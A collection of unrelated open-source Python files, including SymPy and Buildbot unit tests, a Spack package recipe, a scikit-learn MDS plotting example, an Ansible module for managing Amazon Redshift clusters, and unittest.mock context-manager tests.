# We can't continue after other types of brackets
if rawtext[pos] in "'\"":
# Scan a string prefix
while pos > 0 and rawtext[pos - 1] in "rRbBuU":
pos -= 1
last_identifier_pos = pos
break
else:
# We've found an operator or something.
break
return rawtext[last_identifier_pos:self.indexinrawtext]
|
rspavel/spack
|
refs/heads/develop
|
var/spack/repos/builtin/packages/py-pycifrw/package.py
|
5
|
# Copyright 2013-2020 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
from spack import *
class PyPycifrw(PythonPackage):
"""Python library for interacting with Crystallographic Information
Framework (CIF) files."""
homepage = "https://bitbucket.org/jamesrhester/pycifrw/src/development/"
url = "https://pypi.io/packages/source/P/PyCifRW/PyCifRW-4.4.1.tar.gz"
version('4.4.1', sha256='cef7662f475e0eb78a55c2d55774d474e888c96b0539e5f08550afa902cdc4e1')
depends_on('py-setuptools', type='build')
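    # Illustrative usage (not part of the recipe): spack install py-pycifrw@4.4.1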
|
elkingtonmcb/sympy
|
refs/heads/master
|
sympy/polys/tests/test_rationaltools.py
|
124
|
"""Tests for tools for manipulation of rational expressions. """
from sympy.polys.rationaltools import together
from sympy import S, symbols, Rational, sin, exp, Eq, Integral, Mul
from sympy.abc import x, y, z
A, B = symbols('A,B', commutative=False)
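# together() rewrites a sum of rational terms over a common denominator, e.g.
# 1/x + 1/y becomes (x + y)/(x*y); the assertions below pin that behaviour down
# for scalars, nested fractions, deep=True and non-commutative symbols.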
def test_together():
assert together(0) == 0
assert together(1) == 1
assert together(x*y*z) == x*y*z
assert together(x + y) == x + y
assert together(1/x) == 1/x
assert together(1/x + 1) == (x + 1)/x
assert together(1/x + 3) == (3*x + 1)/x
assert together(1/x + x) == (x**2 + 1)/x
assert together(1/x + Rational(1, 2)) == (x + 2)/(2*x)
assert together(Rational(1, 2) + x/2) == Mul(S.Half, x + 1, evaluate=False)
assert together(1/x + 2/y) == (2*x + y)/(y*x)
assert together(1/(1 + 1/x)) == x/(1 + x)
assert together(x/(1 + 1/x)) == x**2/(1 + x)
assert together(1/x + 1/y + 1/z) == (x*y + x*z + y*z)/(x*y*z)
assert together(1/(1 + x + 1/y + 1/z)) == y*z/(y + z + y*z + x*y*z)
assert together(1/(x*y) + 1/(x*y)**2) == y**(-2)*x**(-2)*(1 + x*y)
assert together(1/(x*y) + 1/(x*y)**4) == y**(-4)*x**(-4)*(1 + x**3*y**3)
assert together(1/(x**7*y) + 1/(x*y)**4) == y**(-4)*x**(-7)*(x**3 + y**3)
assert together(5/(2 + 6/(3 + 7/(4 + 8/(5 + 9/x))))) == \
(S(5)/2)*((171 + 119*x)/(279 + 203*x))
assert together(1 + 1/(x + 1)**2) == (1 + (x + 1)**2)/(x + 1)**2
assert together(1 + 1/(x*(1 + x))) == (1 + x*(1 + x))/(x*(1 + x))
assert together(
1/(x*(x + 1)) + 1/(x*(x + 2))) == (3 + 2*x)/(x*(1 + x)*(2 + x))
assert together(1 + 1/(2*x + 2)**2) == (4*(x + 1)**2 + 1)/(4*(x + 1)**2)
assert together(sin(1/x + 1/y)) == sin(1/x + 1/y)
assert together(sin(1/x + 1/y), deep=True) == sin((x + y)/(x*y))
assert together(1/exp(x) + 1/(x*exp(x))) == (1 + x)/(x*exp(x))
assert together(1/exp(2*x) + 1/(x*exp(3*x))) == (1 + exp(x)*x)/(x*exp(3*x))
assert together(Integral(1/x + 1/y, x)) == Integral((x + y)/(x*y), x)
assert together(Eq(1/x + 1/y, 1 + 1/z)) == Eq((x + y)/(x*y), (z + 1)/z)
assert together((A*B)**-1 + (B*A)**-1) == (A*B)**-1 + (B*A)**-1
|
zozo123/buildbot
|
refs/heads/master
|
master/buildbot/test/unit/test_clients_sendchange.py
|
3
|
# This file is part of Buildbot. Buildbot is free software: you can
# redistribute it and/or modify it under the terms of the GNU General Public
# License as published by the Free Software Foundation, version 2.
#
# This program is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
# FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
# details.
#
# You should have received a copy of the GNU General Public License along with
# this program; if not, write to the Free Software Foundation, Inc., 51
# Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
#
# Copyright Buildbot Team Members
import mock
from buildbot.clients import sendchange
from twisted.internet import defer
from twisted.internet import reactor
from twisted.spread import pb
from twisted.trial import unittest
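# The tests below never touch the network: setUp() replaces pb.PBClientFactory
# and reactor.connectTCP with fakes that record the connection target, the
# login credentials and every addChange payload, so assertProcess() can verify
# exactly what Sender.send() would have transmitted.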
class Sender(unittest.TestCase):
def setUp(self):
# patch out some PB components and make up some mocks
self.patch(pb, 'PBClientFactory', self._fake_PBClientFactory)
self.patch(reactor, 'connectTCP', self._fake_connectTCP)
self.factory = mock.Mock(name='PBClientFactory')
self.factory.login = self._fake_login
self.factory.login_d = defer.Deferred()
self.remote = mock.Mock(name='PB Remote')
self.remote.callRemote = self._fake_callRemote
self.remote.broker.transport.loseConnection = self._fake_loseConnection
# results
self.creds = None
self.conn_host = self.conn_port = None
self.lostConnection = False
self.added_changes = []
self.vc_used = None
def _fake_PBClientFactory(self):
return self.factory
def _fake_login(self, creds):
self.creds = creds
return self.factory.login_d
def _fake_connectTCP(self, host, port, factory):
self.conn_host = host
self.conn_port = port
self.assertIdentical(factory, self.factory)
self.factory.login_d.callback(self.remote)
def _fake_callRemote(self, method, change):
self.assertEqual(method, 'addChange')
self.added_changes.append(change)
return defer.succeed(None)
def _fake_loseConnection(self):
self.lostConnection = True
def assertProcess(self, host, port, username, password, changes):
self.assertEqual([host, port, username, password, changes],
[self.conn_host, self.conn_port,
self.creds.username, self.creds.password,
self.added_changes])
def test_send_minimal(self):
s = sendchange.Sender('localhost:1234')
d = s.send('branch', 'rev', 'comm', ['a'])
def check(_):
self.assertProcess('localhost', 1234, 'change', 'changepw', [
dict(project='', repository='', who=None, files=['a'],
comments='comm', branch='branch', revision='rev',
category=None, when=None, properties={}, revlink='',
src=None)])
d.addCallback(check)
return d
def test_send_auth(self):
s = sendchange.Sender('localhost:1234', auth=('me', 'sekrit'))
d = s.send('branch', 'rev', 'comm', ['a'])
def check(_):
self.assertProcess('localhost', 1234, 'me', 'sekrit', [
dict(project='', repository='', who=None, files=['a'],
comments='comm', branch='branch', revision='rev',
category=None, when=None, properties={}, revlink='',
src=None)])
d.addCallback(check)
return d
def test_send_full(self):
s = sendchange.Sender('localhost:1234')
d = s.send('branch', 'rev', 'comm', ['a'], who='me', category='cats',
when=1234, properties={'a': 'b'}, repository='r', vc='git',
project='p', revlink='rl')
def check(_):
self.assertProcess('localhost', 1234, 'change', 'changepw', [
dict(project='p', repository='r', who='me', files=['a'],
comments='comm', branch='branch', revision='rev',
category='cats', when=1234, properties={'a': 'b'},
revlink='rl', src='git')])
d.addCallback(check)
return d
def test_send_files_tuple(self):
# 'buildbot sendchange' sends files as a tuple, rather than a list..
s = sendchange.Sender('localhost:1234')
d = s.send('branch', 'rev', 'comm', ('a', 'b'))
def check(_):
self.assertProcess('localhost', 1234, 'change', 'changepw', [
dict(project='', repository='', who=None, files=['a', 'b'],
comments='comm', branch='branch', revision='rev',
category=None, when=None, properties={}, revlink='',
src=None)])
d.addCallback(check)
return d
def test_send_codebase(self):
s = sendchange.Sender('localhost:1234')
d = s.send('branch', 'rev', 'comm', ['a'], codebase='mycb')
def check(_):
self.assertProcess('localhost', 1234, 'change', 'changepw', [
dict(project='', repository='', who=None, files=['a'],
comments='comm', branch='branch', revision='rev',
category=None, when=None, properties={}, revlink='',
src=None, codebase='mycb')])
d.addCallback(check)
return d
def test_send_unicode(self):
s = sendchange.Sender('localhost:1234')
d = s.send(u'\N{DEGREE SIGN}',
u'\U0001f49e',
u'\N{POSTAL MARK FACE}',
[u'\U0001F4C1'],
project=u'\N{SKULL AND CROSSBONES}',
repository=u'\N{SNOWMAN}',
who=u'\N{THAI CHARACTER KHOMUT}',
category=u'\U0001F640',
when=1234,
properties={u'\N{LATIN SMALL LETTER A WITH MACRON}': 'b'},
revlink=u'\U0001F517')
def check(_):
self.assertProcess('localhost', 1234, 'change', 'changepw', [
dict(project=u'\N{SKULL AND CROSSBONES}',
repository=u'\N{SNOWMAN}',
who=u'\N{THAI CHARACTER KHOMUT}',
files=[u'\U0001F4C1'], # FILE FOLDER
comments=u'\N{POSTAL MARK FACE}',
branch=u'\N{DEGREE SIGN}',
revision=u'\U0001f49e', # REVOLVING HEARTS
category=u'\U0001F640', # WEARY CAT FACE
when=1234,
properties={u'\N{LATIN SMALL LETTER A WITH MACRON}': 'b'},
revlink=u'\U0001F517', # LINK SYMBOL
src=None)])
d.addCallback(check)
return d
def test_send_unicode_utf8(self):
s = sendchange.Sender('localhost:1234')
d = s.send(u'\N{DEGREE SIGN}'.encode('utf8'),
u'\U0001f49e'.encode('utf8'),
u'\N{POSTAL MARK FACE}'.encode('utf8'),
[u'\U0001F4C1'.encode('utf8')],
project=u'\N{SKULL AND CROSSBONES}'.encode('utf8'),
repository=u'\N{SNOWMAN}'.encode('utf8'),
who=u'\N{THAI CHARACTER KHOMUT}'.encode('utf8'),
category=u'\U0001F640'.encode('utf8'),
when=1234,
properties={
u'\N{LATIN SMALL LETTER A WITH MACRON}'.encode('utf8'): 'b'},
revlink=u'\U0001F517'.encode('utf8'))
def check(_):
self.assertProcess('localhost', 1234, 'change', 'changepw', [
dict(project=u'\N{SKULL AND CROSSBONES}',
repository=u'\N{SNOWMAN}',
who=u'\N{THAI CHARACTER KHOMUT}',
files=[u'\U0001F4C1'], # FILE FOLDER
comments=u'\N{POSTAL MARK FACE}',
branch=u'\N{DEGREE SIGN}',
revision=u'\U0001f49e', # REVOLVING HEARTS
category=u'\U0001F640', # WEARY CAT FACE
when=1234,
# NOTE: not decoded!
properties={'\xc4\x81': 'b'},
revlink=u'\U0001F517', # LINK SYMBOL
src=None)])
d.addCallback(check)
return d
def test_send_unicode_latin1(self):
# hand send() a bunch of latin1 strings, and expect them recoded
# to unicode
s = sendchange.Sender('localhost:1234', encoding='latin1')
d = s.send(u'\N{YEN SIGN}'.encode('latin1'),
u'\N{POUND SIGN}'.encode('latin1'),
u'\N{BROKEN BAR}'.encode('latin1'),
[u'\N{NOT SIGN}'.encode('latin1')],
project=u'\N{DEGREE SIGN}'.encode('latin1'),
repository=u'\N{SECTION SIGN}'.encode('latin1'),
who=u'\N{MACRON}'.encode('latin1'),
category=u'\N{PILCROW SIGN}'.encode('latin1'),
when=1234,
properties={
u'\N{SUPERSCRIPT ONE}'.encode('latin1'): 'b'},
revlink=u'\N{INVERTED QUESTION MARK}'.encode('latin1'))
def check(_):
self.assertProcess('localhost', 1234, 'change', 'changepw', [
dict(project=u'\N{DEGREE SIGN}',
repository=u'\N{SECTION SIGN}',
who=u'\N{MACRON}',
files=[u'\N{NOT SIGN}'],
comments=u'\N{BROKEN BAR}',
branch=u'\N{YEN SIGN}',
revision=u'\N{POUND SIGN}',
category=u'\N{PILCROW SIGN}',
when=1234,
# NOTE: not decoded!
properties={'\xb9': 'b'},
revlink=u'\N{INVERTED QUESTION MARK}',
src=None)])
d.addCallback(check)
return d
|
climberwb/video-api
|
refs/heads/master
|
src/billing/__init__.py
|
12133432
| |
vsilent/smarty-bot
|
refs/heads/master
|
core/brain/how/many/__init__.py
|
12133432
| |
TresAmigosSD/SMV
|
refs/heads/master
|
src/test/python/testSmvFramework/hotload/__init__.py
|
12133432
| |
RossBrunton/django
|
refs/heads/master
|
tests/app_loading/__init__.py
|
12133432
| |
watchdogpolska/poradnia.siecobywatelska.pl
|
refs/heads/master
|
poradnia/events/management/__init__.py
|
12133432
| |
synasius/django
|
refs/heads/master
|
tests/view_tests/app5/__init__.py
|
12133432
| |
agconti/njode
|
refs/heads/master
|
env/lib/python2.7/site-packages/django/conf/locale/ru/__init__.py
|
12133432
| |
ProfessionalIT/maxigenios-website
|
refs/heads/master
|
sdk/google_appengine/lib/django-1.2/django/contrib/messages/__init__.py
|
314
|
from api import *
from constants import *
|
ngoix/OCRF
|
refs/heads/master
|
examples/manifold/plot_mds.py
|
45
|
"""
=========================
Multi-dimensional scaling
=========================
An illustration of the metric and non-metric MDS on generated noisy data.
The reconstructed points using the metric MDS and non metric MDS are slightly
shifted to avoid overlapping.
"""
# Author: Nelle Varoquaux <nelle.varoquaux@gmail.com>
# Licence: BSD
print(__doc__)
import numpy as np
from matplotlib import pyplot as plt
from matplotlib.collections import LineCollection
from sklearn import manifold
from sklearn.metrics import euclidean_distances
from sklearn.decomposition import PCA
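# Outline of the example: 20 random 2-D points are generated, their pairwise
# Euclidean distances are perturbed with symmetric noise, and both metric and
# non-metric MDS re-embed the noisy dissimilarities in 2-D; PCA is only used
# to rotate the point clouds into a common orientation before plotting.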
n_samples = 20
seed = np.random.RandomState(seed=3)
X_true = seed.randint(0, 20, 2 * n_samples).astype(np.float)
X_true = X_true.reshape((n_samples, 2))
# Center the data
X_true -= X_true.mean()
similarities = euclidean_distances(X_true)
# Add noise to the similarities
noise = np.random.rand(n_samples, n_samples)
noise = noise + noise.T
noise[np.arange(noise.shape[0]), np.arange(noise.shape[0])] = 0
similarities += noise
mds = manifold.MDS(n_components=2, max_iter=3000, eps=1e-9, random_state=seed,
dissimilarity="precomputed", n_jobs=1)
pos = mds.fit(similarities).embedding_
nmds = manifold.MDS(n_components=2, metric=False, max_iter=3000, eps=1e-12,
dissimilarity="precomputed", random_state=seed, n_jobs=1,
n_init=1)
npos = nmds.fit_transform(similarities, init=pos)
# Rescale the data
pos *= np.sqrt((X_true ** 2).sum()) / np.sqrt((pos ** 2).sum())
npos *= np.sqrt((X_true ** 2).sum()) / np.sqrt((npos ** 2).sum())
# Rotate the data
clf = PCA(n_components=2)
X_true = clf.fit_transform(X_true)
pos = clf.fit_transform(pos)
npos = clf.fit_transform(npos)
fig = plt.figure(1)
ax = plt.axes([0., 0., 1., 1.])
s = 100
plt.scatter(X_true[:, 0], X_true[:, 1], color='navy', s=s, lw=0,
label='True Position')
plt.scatter(pos[:, 0], pos[:, 1], color='turquoise', s=s, lw=0, label='MDS')
plt.scatter(npos[:, 0], npos[:, 1], color='darkorange', s=s, lw=0, label='NMDS')
plt.legend(scatterpoints=1, loc='best', shadow=False)
similarities = similarities.max() / similarities * 100
similarities[np.isinf(similarities)] = 0
# Plot the edges
start_idx, end_idx = np.where(pos)
# a sequence of (*line0*, *line1*, *line2*), where::
# linen = (x0, y0), (x1, y1), ... (xm, ym)
segments = [[X_true[i, :], X_true[j, :]]
for i in range(len(pos)) for j in range(len(pos))]
values = np.abs(similarities)
lc = LineCollection(segments,
zorder=0, cmap=plt.cm.Blues,
norm=plt.Normalize(0, values.max()))
lc.set_array(similarities.flatten())
lc.set_linewidths(0.5 * np.ones(len(segments)))
ax.add_collection(lc)
plt.show()
|
mgit-at/ansible
|
refs/heads/devel
|
lib/ansible/modules/cloud/amazon/redshift.py
|
50
|
#!/usr/bin/python
# Copyright 2014 Jens Carl, Hothead Games Inc.
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
author:
- "Jens Carl (@j-carl), Hothead Games Inc."
module: redshift
version_added: "2.2"
short_description: create, delete, or modify an Amazon Redshift instance
description:
  - Creates, deletes, or modifies Amazon Redshift cluster instances.
options:
command:
description:
- Specifies the action to take.
required: true
choices: [ 'create', 'facts', 'delete', 'modify' ]
identifier:
description:
- Redshift cluster identifier.
required: true
node_type:
description:
- The node type of the cluster. Must be specified when command=create.
choices: ['ds1.xlarge', 'ds1.8xlarge', 'ds2.xlarge', 'ds2.8xlarge', 'dc1.large', 'dc1.8xlarge', 'dc2.large', 'dc2.8xlarge',
'dw1.xlarge', 'dw1.8xlarge', 'dw2.large', 'dw2.8xlarge']
username:
description:
- Master database username. Used only when command=create.
password:
description:
- Master database password. Used only when command=create.
cluster_type:
description:
- The type of cluster.
choices: ['multi-node', 'single-node' ]
default: 'single-node'
db_name:
description:
- Name of the database.
availability_zone:
description:
- availability zone in which to launch cluster
aliases: ['zone', 'aws_zone']
number_of_nodes:
description:
- Number of nodes. Only used when cluster_type=multi-node.
cluster_subnet_group_name:
description:
- which subnet to place the cluster
aliases: ['subnet']
cluster_security_groups:
description:
- in which security group the cluster belongs
aliases: ['security_groups']
vpc_security_group_ids:
description:
- VPC security group
aliases: ['vpc_security_groups']
skip_final_cluster_snapshot:
description:
- skip a final snapshot before deleting the cluster. Used only when command=delete.
aliases: ['skip_final_snapshot']
default: 'no'
version_added: "2.4"
final_cluster_snapshot_identifier:
description:
- identifier of the final snapshot to be created before deleting the cluster. If this parameter is provided,
        skip_final_cluster_snapshot must be false. Used only when command=delete.
aliases: ['final_snapshot_id']
version_added: "2.4"
preferred_maintenance_window:
description:
- maintenance window
aliases: ['maintance_window', 'maint_window']
cluster_parameter_group_name:
description:
- name of the cluster parameter group
aliases: ['param_group_name']
automated_snapshot_retention_period:
description:
      - retention period for automated snapshots
aliases: ['retention_period']
port:
description:
      - which port the cluster is listening on
cluster_version:
description:
- which version the cluster should have
aliases: ['version']
choices: ['1.0']
allow_version_upgrade:
description:
      - flag to determine whether version upgrades are allowed
aliases: ['version_upgrade']
default: 'yes'
publicly_accessible:
description:
      - whether the cluster is publicly accessible
default: 'no'
encrypted:
description:
      - whether the cluster is encrypted
default: 'no'
elastic_ip:
description:
      - whether the cluster has an elastic IP
new_cluster_identifier:
description:
- Only used when command=modify.
aliases: ['new_identifier']
wait:
description:
- When command=create, modify or restore then wait for the database to enter the 'available' state. When command=delete wait for the database to be
terminated.
type: bool
default: 'no'
wait_timeout:
description:
- how long before wait gives up, in seconds
default: 300
requirements: [ 'boto' ]
extends_documentation_fragment:
- aws
- ec2
'''
EXAMPLES = '''
# Basic cluster provisioning example
- redshift: >
command=create
node_type=ds1.xlarge
identifier=new_cluster
username=cluster_admin
password=1nsecure
# Cluster delete example
- redshift:
command: delete
identifier: new_cluster
skip_final_cluster_snapshot: true
wait: true
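# Cluster modify example (a sketch only; parameter values are illustrative)
- redshift:
    command: modify
    identifier: new_cluster
    new_cluster_identifier: renamed_cluster
    wait: true
    wait_timeout: 600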
'''
RETURN = '''
cluster:
description: dictionary containing all the cluster information
returned: success
type: complex
contains:
identifier:
description: Id of the cluster.
returned: success
type: string
sample: "new_redshift_cluster"
create_time:
description: Time of the cluster creation as timestamp.
returned: success
type: float
sample: 1430158536.308
status:
      description: Status of the cluster.
returned: success
type: string
sample: "available"
db_name:
description: Name of the database.
returned: success
type: string
sample: "new_db_name"
availability_zone:
description: Amazon availability zone where the cluster is located.
returned: success
type: string
sample: "us-east-1b"
maintenance_window:
description: Time frame when maintenance/upgrade are done.
returned: success
type: string
sample: "sun:09:30-sun:10:00"
private_ip_address:
description: Private IP address of the main node.
returned: success
type: string
sample: "10.10.10.10"
public_ip_address:
description: Public IP address of the main node.
returned: success
type: string
sample: "0.0.0.0"
port:
description: Port of the cluster.
returned: success
type: int
sample: 5439
url:
description: FQDN of the main cluster node.
returned: success
type: string
sample: "new-redshift_cluster.jfkdjfdkj.us-east-1.redshift.amazonaws.com"
'''
import time
try:
import boto.exception
import boto.redshift
except ImportError:
pass # Taken care of by ec2.HAS_BOTO
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.ec2 import HAS_BOTO, connect_to_aws, ec2_argument_spec, get_aws_connection_info
def _collect_facts(resource):
"""Transfrom cluster information to dict."""
facts = {
'identifier': resource['ClusterIdentifier'],
'create_time': resource['ClusterCreateTime'],
'status': resource['ClusterStatus'],
'username': resource['MasterUsername'],
'db_name': resource['DBName'],
'availability_zone': resource['AvailabilityZone'],
'maintenance_window': resource['PreferredMaintenanceWindow'],
'url': resource['Endpoint']['Address'],
'port': resource['Endpoint']['Port']
}
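    # The endpoint IP addresses are taken from the LEADER node (or the SHARED
    # node of a single-node cluster); the first matching node wins.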
for node in resource['ClusterNodes']:
if node['NodeRole'] in ('SHARED', 'LEADER'):
facts['private_ip_address'] = node['PrivateIPAddress']
facts['public_ip_address'] = node['PublicIPAddress']
break
return facts
def create_cluster(module, redshift):
"""
Create a new cluster
module: AnsibleModule object
redshift: authenticated redshift connection object
    Returns: tuple of (changed, dict of cluster facts)
"""
identifier = module.params.get('identifier')
node_type = module.params.get('node_type')
username = module.params.get('username')
password = module.params.get('password')
wait = module.params.get('wait')
wait_timeout = module.params.get('wait_timeout')
changed = True
# Package up the optional parameters
params = {}
for p in ('db_name', 'cluster_type', 'cluster_security_groups',
'vpc_security_group_ids', 'cluster_subnet_group_name',
'availability_zone', 'preferred_maintenance_window',
'cluster_parameter_group_name',
'automated_snapshot_retention_period', 'port',
'cluster_version', 'allow_version_upgrade',
'number_of_nodes', 'publicly_accessible',
'encrypted', 'elastic_ip', 'enhanced_vpc_routing'):
if p in module.params:
params[p] = module.params.get(p)
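    # If the cluster already exists, describe_clusters() succeeds and nothing is
    # created (changed stays False); a JSONResponseError is treated as "cluster
    # not found" and triggers the actual create_cluster call below.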
try:
redshift.describe_clusters(identifier)['DescribeClustersResponse']['DescribeClustersResult']['Clusters'][0]
changed = False
except boto.exception.JSONResponseError as e:
try:
redshift.create_cluster(identifier, node_type, username, password, **params)
except boto.exception.JSONResponseError as e:
module.fail_json(msg=str(e))
try:
resource = redshift.describe_clusters(identifier)['DescribeClustersResponse']['DescribeClustersResult']['Clusters'][0]
except boto.exception.JSONResponseError as e:
module.fail_json(msg=str(e))
if wait:
try:
wait_timeout = time.time() + wait_timeout
time.sleep(5)
while wait_timeout > time.time() and resource['ClusterStatus'] != 'available':
time.sleep(5)
if wait_timeout <= time.time():
module.fail_json(msg="Timeout waiting for resource %s" % resource.id)
resource = redshift.describe_clusters(identifier)['DescribeClustersResponse']['DescribeClustersResult']['Clusters'][0]
except boto.exception.JSONResponseError as e:
module.fail_json(msg=str(e))
return(changed, _collect_facts(resource))
def describe_cluster(module, redshift):
"""
Collect data about the cluster.
module: Ansible module object
redshift: authenticated redshift connection object
"""
identifier = module.params.get('identifier')
try:
resource = redshift.describe_clusters(identifier)['DescribeClustersResponse']['DescribeClustersResult']['Clusters'][0]
except boto.exception.JSONResponseError as e:
module.fail_json(msg=str(e))
return(True, _collect_facts(resource))
def delete_cluster(module, redshift):
"""
Delete a cluster.
module: Ansible module object
redshift: authenticated redshift connection object
"""
identifier = module.params.get('identifier')
wait = module.params.get('wait')
wait_timeout = module.params.get('wait_timeout')
skip_final_cluster_snapshot = module.params.get('skip_final_cluster_snapshot')
final_cluster_snapshot_identifier = module.params.get('final_cluster_snapshot_identifier')
try:
redshift.delete_cluster(
identifier,
skip_final_cluster_snapshot,
final_cluster_snapshot_identifier
)
except boto.exception.JSONResponseError as e:
module.fail_json(msg=str(e))
if wait:
try:
wait_timeout = time.time() + wait_timeout
resource = redshift.describe_clusters(identifier)['DescribeClustersResponse']['DescribeClustersResult']['Clusters'][0]
while wait_timeout > time.time() and resource['ClusterStatus'] != 'deleting':
time.sleep(5)
if wait_timeout <= time.time():
module.fail_json(msg="Timeout waiting for resource %s" % resource.id)
resource = redshift.describe_clusters(identifier)['DescribeClustersResponse']['DescribeClustersResult']['Clusters'][0]
except boto.exception.JSONResponseError as e:
module.fail_json(msg=str(e))
return(True, {})
def modify_cluster(module, redshift):
"""
Modify an existing cluster.
module: Ansible module object
redshift: authenticated redshift connection object
"""
identifier = module.params.get('identifier')
wait = module.params.get('wait')
wait_timeout = module.params.get('wait_timeout')
# Package up the optional parameters
params = {}
for p in ('cluster_type', 'cluster_security_groups',
'vpc_security_group_ids', 'cluster_subnet_group_name',
'availability_zone', 'preferred_maintenance_window',
'cluster_parameter_group_name',
'automated_snapshot_retention_period', 'port', 'cluster_version',
'allow_version_upgrade', 'number_of_nodes', 'new_cluster_identifier',
'enhanced_vpc_routing'):
if p in module.params:
params[p] = module.params.get(p)
try:
redshift.describe_clusters(identifier)['DescribeClustersResponse']['DescribeClustersResult']['Clusters'][0]
except boto.exception.JSONResponseError as e:
try:
redshift.modify_cluster(identifier, **params)
except boto.exception.JSONResponseError as e:
module.fail_json(msg=str(e))
try:
resource = redshift.describe_clusters(identifier)['DescribeClustersResponse']['DescribeClustersResult']['Clusters'][0]
except boto.exception.JSONResponseError as e:
module.fail_json(msg=str(e))
if wait:
try:
wait_timeout = time.time() + wait_timeout
time.sleep(5)
while wait_timeout > time.time() and resource['ClusterStatus'] != 'available':
time.sleep(5)
if wait_timeout <= time.time():
module.fail_json(msg="Timeout waiting for resource %s" % resource.id)
resource = redshift.describe_clusters(identifier)['DescribeClustersResponse']['DescribeClustersResult']['Clusters'][0]
except boto.exception.JSONResponseError as e:
                # see https://github.com/boto/boto/issues/2776
module.fail_json(msg=str(e))
return(True, _collect_facts(resource))
def main():
argument_spec = ec2_argument_spec()
argument_spec.update(dict(
command=dict(choices=['create', 'facts', 'delete', 'modify'], required=True),
identifier=dict(required=True),
node_type=dict(choices=['ds1.xlarge', 'ds1.8xlarge', 'ds2.xlarge', 'ds2.8xlarge', 'dc1.large',
'dc2.large', 'dc1.8xlarge', 'dw1.xlarge', 'dw1.8xlarge', 'dw2.large',
'dw2.8xlarge'], required=False),
username=dict(required=False),
password=dict(no_log=True, required=False),
        db_name=dict(required=False),
cluster_type=dict(choices=['multi-node', 'single-node', ], default='single-node'),
cluster_security_groups=dict(aliases=['security_groups'], type='list'),
vpc_security_group_ids=dict(aliases=['vpc_security_groups'], type='list'),
skip_final_cluster_snapshot=dict(aliases=['skip_final_snapshot'], type='bool', default=False),
final_cluster_snapshot_identifier=dict(aliases=['final_snapshot_id'], required=False),
cluster_subnet_group_name=dict(aliases=['subnet']),
availability_zone=dict(aliases=['aws_zone', 'zone']),
preferred_maintenance_window=dict(aliases=['maintance_window', 'maint_window']),
cluster_parameter_group_name=dict(aliases=['param_group_name']),
automated_snapshot_retention_period=dict(aliases=['retention_period']),
port=dict(type='int'),
cluster_version=dict(aliases=['version'], choices=['1.0']),
allow_version_upgrade=dict(aliases=['version_upgrade'], type='bool', default=True),
number_of_nodes=dict(type='int'),
publicly_accessible=dict(type='bool', default=False),
encrypted=dict(type='bool', default=False),
elastic_ip=dict(required=False),
new_cluster_identifier=dict(aliases=['new_identifier']),
enhanced_vpc_routing=dict(type='bool', default=False),
wait=dict(type='bool', default=False),
wait_timeout=dict(type='int', default=300),
))
required_if = [
('command', 'delete', ['skip_final_cluster_snapshot']),
('skip_final_cluster_snapshot', False, ['final_cluster_snapshot_identifier'])
]
module = AnsibleModule(
argument_spec=argument_spec,
required_if=required_if
)
if not HAS_BOTO:
module.fail_json(msg='boto v2.9.0+ required for this module')
command = module.params.get('command')
region, ec2_url, aws_connect_params = get_aws_connection_info(module)
if not region:
module.fail_json(msg=str("region not specified and unable to determine region from EC2_REGION."))
# connect to the rds endpoint
try:
conn = connect_to_aws(boto.redshift, region, **aws_connect_params)
except boto.exception.JSONResponseError as e:
module.fail_json(msg=str(e))
changed = True
if command == 'create':
(changed, cluster) = create_cluster(module, conn)
elif command == 'facts':
(changed, cluster) = describe_cluster(module, conn)
elif command == 'delete':
(changed, cluster) = delete_cluster(module, conn)
elif command == 'modify':
(changed, cluster) = modify_cluster(module, conn)
module.exit_json(changed=changed, cluster=cluster)
if __name__ == '__main__':
main()
|
40123151ChengYu/2015cd_midterm
|
refs/heads/master
|
static/Brython3.1.1-20150328-091302/Lib/unittest/test/testmock/testwith.py
|
739
|
import unittest
from warnings import catch_warnings
from unittest.test.testmock.support import is_instance
from unittest.mock import MagicMock, Mock, patch, sentinel, mock_open, call
something = sentinel.Something
something_else = sentinel.SomethingElse
class WithTest(unittest.TestCase):
def test_with_statement(self):
with patch('%s.something' % __name__, sentinel.Something2):
self.assertEqual(something, sentinel.Something2, "unpatched")
self.assertEqual(something, sentinel.Something)
def test_with_statement_exception(self):
try:
with patch('%s.something' % __name__, sentinel.Something2):
self.assertEqual(something, sentinel.Something2, "unpatched")
raise Exception('pow')
except Exception:
pass
else:
self.fail("patch swallowed exception")
self.assertEqual(something, sentinel.Something)
def test_with_statement_as(self):
with patch('%s.something' % __name__) as mock_something:
self.assertEqual(something, mock_something, "unpatched")
self.assertTrue(is_instance(mock_something, MagicMock),
"patching wrong type")
self.assertEqual(something, sentinel.Something)
def test_patch_object_with_statement(self):
class Foo(object):
something = 'foo'
original = Foo.something
with patch.object(Foo, 'something'):
self.assertNotEqual(Foo.something, original, "unpatched")
self.assertEqual(Foo.something, original)
def test_with_statement_nested(self):
with catch_warnings(record=True):
with patch('%s.something' % __name__) as mock_something, patch('%s.something_else' % __name__) as mock_something_else:
self.assertEqual(something, mock_something, "unpatched")
self.assertEqual(something_else, mock_something_else,
"unpatched")
self.assertEqual(something, sentinel.Something)
self.assertEqual(something_else, sentinel.SomethingElse)
def test_with_statement_specified(self):
with patch('%s.something' % __name__, sentinel.Patched) as mock_something:
self.assertEqual(something, mock_something, "unpatched")
self.assertEqual(mock_something, sentinel.Patched, "wrong patch")
self.assertEqual(something, sentinel.Something)
def testContextManagerMocking(self):
mock = Mock()
mock.__enter__ = Mock()
mock.__exit__ = Mock()
mock.__exit__.return_value = False
with mock as m:
self.assertEqual(m, mock.__enter__.return_value)
mock.__enter__.assert_called_with()
mock.__exit__.assert_called_with(None, None, None)
def test_context_manager_with_magic_mock(self):
mock = MagicMock()
with self.assertRaises(TypeError):
with mock:
'foo' + 3
mock.__enter__.assert_called_with()
self.assertTrue(mock.__exit__.called)
def test_with_statement_same_attribute(self):
with patch('%s.something' % __name__, sentinel.Patched) as mock_something:
